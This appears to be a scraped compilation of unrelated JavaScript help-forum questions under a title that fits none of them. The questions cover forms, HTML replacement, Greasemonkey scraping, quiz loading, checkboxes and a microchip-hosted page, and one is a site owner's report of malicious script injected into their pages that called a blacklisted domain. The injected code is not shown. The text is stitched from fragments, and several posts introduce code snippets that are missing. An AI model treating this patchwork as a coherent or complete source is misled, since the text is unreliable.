JavaScript - Displaying Html Code Only On Specific Pages

I have a document that contains four forms. I want to run a function only in the form the user is currently in. I keep getting the "document.my_form_name is undefined" error. I've tried all sorts of ways of doing this but can't find a solution.

Here's a snippet of the HTML:

I'm a bit of a Javascript noob, so please bear with me!

I'm trying to create a piece of code that will check a webpage and replace any instances of a specific line of HTML with another line of HTML.

The code I have so far doesn't work, but I have a feeling that's down to my awful Javascript skills!

For example, in the following code I'd want to replace all instances of <li><a href="index.pdf">Index</a></li> with <li><a href="contents.pdf">Contents</a></li>

Obviously this is meant to just replaces the a href elements, but I got a bit stuck after this!

So today I have discovered some malicious JavaScript code inserted into a bunch of my pages on a webserver. Access to these pages through FTP is granted to 3 people, myself, my boss, and a contract programmer. Unfortunately, the FTP server wasn't set to log, so I can't tell for sure if it was the programmer, but my assumption and suspicion is that it was him.

This code was inserted at the bottom of multiple pages. I can't make heads or tails of it, but it cannot be good, whatever it is. When I view the page that it was on, I noticed the web browser connecting to http://over-blog-com.alice.it.baixin...rseasilver.ru/. Browsing to this page takes you to some foreign hosting site. Googling superseasilver.ru only provides a page that has this address listed in a blacklist.

I'd like to know what this code does, but again, I have no idea... So I figured maybe some of you JavaScript gurus could take a look and be able to tell me. Any information would be greatly appreciated, as we hired this programmer through odesk.com, and will be filing a complaint for refund and him being banned from the site. I'd also like to know if there is any possibility that this was inserted some other way other than someone FTP'n in and doing this.

I know lot of scripts written by experts in JS that extracts urls from source code placed into DIV or TEXTAREA, but I would need just one to extract the links ending by ".html" or ".htm" or ".txt".

Well after much trial and error I come asking for help. I am trying to write a greasemonkey script that scans a page for all the values between certain <td> tags. When I used firebug it shows what I am looking for as
<td class="username">THEUSERNAME</td>
but when I view the source it just shows up as
<td>THEUSERNAME</td>
I want to create an array of the 100 <td>'s on the page that pertain to usernames but none of the other <td>'s

I created a test page that mimicked the code, what I thought origionally, to be so I could test my script with ease. And it worked when there was an actually <td class="username">

Im using a authoring tool to develop an elearning test course. The course is composed of several HTML pages with Buttons for the multiple choice test. The setup of the course is that it will only ask 10 questions out of a pool of 30 questions.

When the HTML & JS files are online, the test takes 20-40seconds to load. I believe it is related to the code that selects the 10 questions from the 30.

I've singled out the code that does the select random pages... Is there any way to optimize the code?

I have about 100 pages of HTML, and I want to only have to put in the specific data once. My Javascript is rusty and I am on a short fuse, unfortunately, so some help would be appreciated.

All pages have one picture with URL path to the image, an initial width, and a title string.

I would like to define these once in a Javascript etc, and have a script plug those values into the page Title, the width of the pic <img> tag, the URL of the src of the pic, and a text title in the body (above the pic) of the page.

then in the script I would need:

Basically what happens is, when you select a checkbox it displays the relevant divs, this works fine with the entertainment checkbox in the code.

What I am trying to achieve is use an image to trigger the checkbox (which will be hidden) and the run the chk code to display the divs

What actually happens when you click the image the checkbox does become checked, however the divs do not display, if I uncheck the checkbox itself and then check the actual checkbox then it works.

Basically getting very frustrated as I can't seem to see whats wrong! I am guessing that for some reason the check code stops the chk running, but I dont know why!

I'd like to modify a form on www.formsite.com (form builder app):

I would like to use the nicedit.com's inline content editor's js to transform my textarea's into a richtext area. At present the nicedit editor works well in creating the richtextarea. However, the KEY point is that I would like formsite's form to pipe in the the created html and render it with the html component of formsite. Currently, the pipe function in formsite will only put out the html syntax in it's html module.

So this would be: 1. checking out my form on formsite.com 2. the script from nicedit.com is already installed in an html component. 3. changing or telling me the scripts/tags/or whatever for formsite form using formsites form builder (which allows some html/script editing). 4. changed so as to render the rich text entered on page 1 in page 2 instead of the html syntax.

Any other solutions using formsite and any other richtextarea solutions would be great too!

I'm having problems displaying images on a site. Basically I have a to change an image each time a button is pressed on a piece of hardware.

This site is being hosted on a microchip, btn0 is a press button switch on the board. The idea is to use this as a remote monitoring system. It runs Javascript XML HTML and CSS.

Any help would be greatly appreciated, I have spent hours searching for a way to do this ( simple ? ) task but haven't got any further than this.

Hey, i am just trying to learn javascript and my friend gave me a little assignment to try and figure out. i am having trouble figuring it out and need some help.

basically i just want to display the information in my associative array, into an html table.

i basically want to do this using a for loop, and he gave me a hint about using a nested while loop as well somehow. i know i need to use getElementById, id, and innerHTML stuff but i just don't know how to do it. i cant find anything to help me with this simple task, hoping someone here could help.
